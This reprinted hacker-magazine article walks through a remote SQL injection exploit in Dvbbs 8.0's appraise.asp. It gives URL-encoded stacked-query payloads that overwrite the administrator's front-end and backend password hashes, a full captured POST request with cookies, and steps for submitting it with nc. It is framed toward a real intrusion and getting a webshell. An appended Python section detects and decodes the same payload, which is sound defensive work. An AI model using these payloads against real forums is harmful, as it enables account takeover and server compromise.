Dvbbs 8.0: the latest remote injection vulnerability

Source: Internet
Author: User
Tags: md5, hash, administrator, password
This article was previously published in issue 9 of the magazine Hacker XFile. Please credit the source when reprinting.

Since the release of v5.6, Dvbbs (the Dongwang forum, rendered elsewhere as "Mobile Network" or "Dynamic Network") has rarely had a high-risk vulnerability exposed, and I had been getting nowhere with Dvbbs 8.0. Fortunately, a very serious remote injection vulnerability has finally surfaced. It is only valid for the SQL Server version; the Access version is not affected. The problematic file is appraise.asp. The vulnerability allows the administrator's password to be changed directly, although the procedure is somewhat inconvenient. To test it in detail, I set up a Dvbbs 8.0 SQL version forum on my local machine. Once the test environment is up, the vulnerability can be tested. The administrator's username (admin) and password (admin888) are known. Register an ordinary user whose username and password are both hackest, log on to the forum, and post a topic in any board. After posting, click "click to participate in comments" in the lower-right corner of the post browsing page that is returned.

This opens the comment page, as shown in Figure 2.

Then start the packet capture tool Winsock Expert so that it is ready to capture the request, as shown in Figure 3.

Fill in some content on the comment page, making sure the verification code is entered correctly, and click "post comment" to submit it. When the prompt says the comment was posted successfully, click "OK" and return to the packet capture tool, where the information we need can be found, as shown in Figure 4.

Save the captured packet to a text file (test.txt). The next step is a bit more involved, because we need to construct this packet and then submit it with nc. First construct the injection statement. For example, to change the administrator's front-end login password, the statement can be constructed as follows:
%3bdeclare+@A+sysname+select+@A%3d0x6500650065003000310063003900610062003700320036003700660032003500+Update+DV%5Fuser+set+userpassword%3d@A+where+userid%3d1
The un-encoded form of this code is:
;declare @A sysname select @A=0x6500650065003000310063003900610062003700320036003700660032003500
update dv_user set userpassword=@A where userid=1
In plain terms, this statement changes the userpassword field of the row with userid=1 in the dv_user table to the hash of hackest. The literal 0x6500650065003000310063003900610062003700320036003700660032003500 is obtained as follows: take the 16-character MD5 hash of the string hackest, eee01c9ab3167f25, and use a conversion tool to turn it into the SQL Server Unicode (nvarchar) hex form, as shown in Figures 5 and 6.

The statement is transformed this way to bypass the filtering in Dvbbs 8.0. If it is hard to follow, read it a few more times and try it out. Append the transformed injection statement we constructed (%3bdeclare+@A+sysname+select+@A%3d0x6500650065003000310063003900610062003700320036003700660032003500+Update+DV%5Fuser+set+userpassword%3d@A+where+userid%3d1) directly after topicid=1 in the last line of the packet, then count the characters added to the packet (the original packet length is 90 and 152 characters were added, 242 in total), change the 90 after Content-Length to 242, and save the file. Be careful here: if the packet length is wrong, the submission via nc will fail. Before submitting with nc, note that the userpassword field for admin in the dv_user table is 469e80d32c0559f8, as shown in Figure 7.

Next, use nc to submit the packet. Put nc.exe and test.txt in the same directory (I used the C: root directory) and run nc 127.0.0.1 80, feeding it test.txt, as shown in Figure 8.

If this information is returned, the administrator admin's front-end login password has been changed successfully. Since the test environment is on my local machine, I can easily check the data. Looking at the table confirms it: userpassword has changed from the original 16-character MD5 of admin888 (469e80d32c0559f8) to the 16-character MD5 of hackest (eee01c9ab3167f25), as shown in Figure 9.

The vulnerability is confirmed. In a real intrusion, however, we also need to change the administrator's backend login password in order to enter the backend and obtain a webshell, and what we just changed was only the front-end login password. The following packet changes the administrator's backend login password:
%3bdeclare+@A+sysname+select+@A%3d0x6500650065003000310063003900610062003700320036003700660032003500+Update+DV%5Fadmin+set+password%3d@A+where+id%3d1
Its un-encoded form is:
;declare @A sysname select @A=0x6500650065003000310063003900610062003700320036003700660032003500
update dv_admin set password=@A where id=1
Swap in this statement, again appending it after topicid=1 on the last line of test.txt, and save. After submitting with nc, output similar to Figure 8 is returned. Checking the database shows that admin's backend login password has been changed successfully, as shown in Figure 10.

You can now log on to the backend with the new password.

That completes the manual test of the vulnerability. It may be too cumbersome for newcomers, so is there a tool for exploiting it? Yes: skilled people have already written an exploitation tool, whose interface is shown in Figure 12.

The information to fill in also has to be captured: URL, boardid, topicid, announceid, verification code (acodestr), Cookie and so on. The captured packet looks like the following:
POST /appraise.asp?action=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*
Referer: http://127.0.0.1/dispbbs.asp?boardid=1&id=1&page=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler; .NET CLR 1.1.4322)
Host: 127.0.0.1
Content-Length: 90
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: w0802=2; rtime=1; ltime=1187503483390; w08_eid=57689537-http%3A//127.0.0.1/index.asp%3fboardid%3d1; dvforum=userid=2&usercookies=0&statuserid=4086140&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=hackest&password=v0qdt2f765u6x7j5&userhidden=2; geturl=%2fpost%5fupload%2easp%3fboardid%3d1; bandwidth=enabled; upnum=0; dvbbs=baffbdfhbe; ASPSESSIONIDQQQRSRAQ=enabled; ASPSESSIONIDQSQRTRAQ=enabled

boardid=1&topicid=1&announceid=1&atype=0&a1=0&a2=0&atitle=Test&acodestr=8598&acontent=test

Fill in the required fields by referring to that content, then enter the following in the SQL injection field (this sets the password to admin888):
;declare @A sysname select @A=0x3400360039006500380030006400330032006300300035003500390066003800 update dv_admin set password=@A where id=1
Click the "code" button next to it (which performs the encoding transformation described above) and submit, as shown in Figure 13.
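As an added, defender-side example (not part of the original article or of Dvbbs itself), the Python below scans an appraise.asp POST body like the one captured above for the stacked-query payload used throughout this article, decodes the 0x literal (UTF-16LE, since sysname is an nvarchar type) and reports which table, column and row it writes, which is what an incident responder needs to know after such a request is found in the logs. The sample body is constructed here from the page's own captured request and dv_admin payload; the signature regex and the 16-character MD5 helper are this example's own, the latter reproducing the admin888 hash the article quotes.

```python
import hashlib
import re
from urllib.parse import unquote_plus

# Signature of the stacked-query payload the article describes: a statement
# separator, DECLARE of a sysname (nvarchar) variable, a 0x literal assigned to
# it, then an UPDATE of a dv_ table writing the variable into one column.
STACKED_UPDATE = re.compile(
    r";\s*declare\s+@\w+\s+sysname\s+select\s+@\w+\s*=\s*0x([0-9a-f]+)\s+"
    r"update\s+(dv_\w+)\s+set\s+(\w+)\s*=\s*@\w+\s+where\s+(\w+)\s*=\s*(\d+)",
    re.IGNORECASE,
)

def decode_hex_literal(hexstr):
    """A 0x literal assigned to a sysname variable is stored as nvarchar, so the
    bytes are UTF-16LE: 0x6500 is 'e', 0x3400 is '4', and so on."""
    return bytes.fromhex(hexstr).decode("utf-16-le")

def short_md5(password):
    """The forum stores the middle 16 hex digits of the 32-digit MD5 hash."""
    return hashlib.md5(password.encode()).hexdigest()[8:24]

def inspect_form_body(body):
    """Return one finding per form field carrying the stacked UPDATE payload."""
    findings = []
    for pair in body.split("&"):
        field, _, raw_value = pair.partition("=")
        value = unquote_plus(raw_value)   # '+' -> ' ', %3b -> ';', %5f -> '_'
        match = STACKED_UPDATE.search(value)
        if match is None:
            continue
        hexstr, table, column, key, key_value = match.groups()
        findings.append({
            "field": field,
            "table": table.lower(),
            "column": column.lower(),
            "row": f"{key.lower()}={key_value}",
            "written_value": decode_hex_literal(hexstr),
        })
    return findings

# Constructed sample: the comment form body captured in the article, with the
# page's dv_admin payload appended to topicid as the walkthrough does.
SAMPLE_BODY = (
    "Boardid=1&topicid=1%3bdeclare+@A+sysname+select+@A%3d0x"
    "3400360039006500380030006400330032006300300035003500390066003800"
    "+Update+DV%5fadmin+set+password%3d@A+where+id%3d1"
    "&announceid=1&Atype=0&a1=0&a2=0&atitle=Test&acodestr=8598&acontent=test"
)
```

Running inspect_form_body(SAMPLE_BODY) reports a single finding on the topicid field writing dv_admin.password for id=1 with the decoded value 469e80d32c0559f8, the admin888 hash the article quotes.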

The administrator's backend login password is changed to admin888, as shown in Figure 14.

This completes the test of the vulnerability; the procedure is somewhat involved. For how to obtain a webshell from the backend, see the method described in the earlier article "Dvbbs 8.0 backend webshell battle".